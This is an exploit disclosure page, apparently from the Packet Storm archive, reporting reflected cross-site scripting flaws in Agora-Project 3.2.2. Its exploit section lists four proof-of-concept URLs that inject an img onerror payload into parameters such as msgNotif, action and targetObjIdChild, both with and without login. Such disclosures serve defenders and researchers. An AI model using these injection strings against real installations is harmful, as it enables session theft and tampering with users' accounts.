what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Agora-Project 3.2.2 Cross Site Scripting

Agora-Project 3.2.2 Cross Site Scripting
Posted Mar 8, 2017
Authored by yokoacc, rungga_reksya, AdyWikradinata

Agora-Project version 3.2.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | a2252fb99ebcf67cddcac5a545419ae7cc14ae33b48d9d6e2edcb8d5c507052f

Agora-Project 3.2.2 Cross Site Scripting

Change Mirror Download
# Exploit Title: XSS Vulnerability on Agora-Project 3.2.2
# Google Dork: no
# Date: 23-02-2017
# Exploit Author: @rungga_reksya, @AdyWikradinata, @yokoacc
# Vendor Homepage: https://www.agora-project.net
# Software Link: https://www.agora-project.net/?ctrl=offline&action=download
# Software Link Mirror: https://jaist.dl.sourceforge.net/project/agora-project/agora_project_3.2.2.zip
# Version: 3.2.2
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : no

I. Background:
Agora-Project is a workspace dedicated to collaboration and information exchange. Complete and intuitive, this tool is accessible via a simple web browser. Ideal for teamwork, it facilitate the exchange and creativity of a group around a common project, releasing the constraints of time and space.

Agora-Project is ideal for small structures such as associations, schools or SME, but is also suitable for larger organizations by allowing the establishment of subspaces.

II. Description
Vulnerability on CMS Agora is XSS

III. Exploit
No Login:
http://IP_Address/folder_agora_project_3.2.2/index.php?disconnect=1&msgNotif[]="><img src=x onerror=prompt(/XSS/)>
http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=misc&action="><img src=x onerror=prompt(/XSS/)>&editObjId="><img src=x onerror=prompt(/XSS/)>

Needed login:
http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=object&action="><img src=x onerror=prompt(/XSS/)>_id="><img src=x onerror=prompt(/XSS/)>
http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=file&targetObjId=fileFolder-2&targetObjIdChild="><img src=x onerror=prompt(/XSS/)>


IV. Thanks to
- Alloh SWT
- https://www.exploit-db.com/exploits/19329 (Chris Russell)
- MyBoboboy
- @AdyWikradinata, @yokoacc
- Komunitas IT Auditor & IT Security Kaskus
- Openbugbounty.org
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close